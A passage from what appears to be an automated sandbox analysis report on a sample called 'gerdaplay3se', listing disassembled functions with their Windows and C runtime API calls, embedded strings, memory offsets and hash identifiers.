                                                                                    • Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428
                                                                                    • Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3
                                                                                  Strings
                                                                                  • Month number is out of range 1..12, xrefs: 02D6392C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Month number is out of range 1..12
                                                                                  • API String ID: 3258419250-4198407886
                                                                                  • Opcode ID: 811a7fe5c32e59cb9a65b591944277268f5ee2ac67847ec813dc09fa5b72338d
                                                                                  • Instruction ID: 587c9e51e0e0fbb971cc0b93f21a8892ef897986a6b7e6289d1e471647fe8eab
                                                                                  • Opcode Fuzzy Hash: 811a7fe5c32e59cb9a65b591944277268f5ee2ac67847ec813dc09fa5b72338d
                                                                                  • Instruction Fuzzy Hash: 85E0D872E0010897E714BFD49815BFDB776DB18B10F50044AD801A37C0DAF12D148BE5
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32 ref: 02D619CC
                                                                                  • GetLastError.KERNEL32 ref: 02D619D9
                                                                                    • Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocErrorH_prologLast
                                                                                  • String ID: tss
                                                                                  • API String ID: 249634027-1638339373
                                                                                  • Opcode ID: c22533d235717e47ff92d1b8c5723d0a2ee37f30e1aa273d38677dc7fbc021e0
                                                                                  • Instruction ID: b237ee48bd1ac1c147cf411ee91f44167be3da393ed1f7a8d98beacf3d2d4cf4
                                                                                  • Opcode Fuzzy Hash: c22533d235717e47ff92d1b8c5723d0a2ee37f30e1aa273d38677dc7fbc021e0
                                                                                  • Instruction Fuzzy Hash: B4E08635D142109BC3007B78DC091ABBBA4DA41231F208B66ECBD833D0FB308D108BD6
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D63BD8
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 02D63BED
                                                                                    • Part of subcall function 02D723F7: std::exception::exception.LIBCMT ref: 02D72401
                                                                                    • Part of subcall function 02D6A58E: __EH_prolog.LIBCMT ref: 02D6A593
                                                                                    • Part of subcall function 02D6A58E: __CxxThrowException@8.LIBCMT ref: 02D6A5BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 1300498068-3145022300
                                                                                  • Opcode ID: dd061c54d87e9ce57478e048fcc38d5a1977d9aed53e73eeacb057fdd531c124
                                                                                  • Instruction ID: 829389a11f9e386e7a8fea826ac1c5e4eac9bc08b64f0021a9b675dc0cb6c548
                                                                                  • Opcode Fuzzy Hash: dd061c54d87e9ce57478e048fcc38d5a1977d9aed53e73eeacb057fdd531c124
                                                                                  • Instruction Fuzzy Hash: 77E01A719001099BC714EF94E545BBCB771EB15701F8080ADED06573D0DB359D55CAA5
                                                                                  APIs
                                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3499195154-0
                                                                                  • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                  • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                                                  • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                  • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19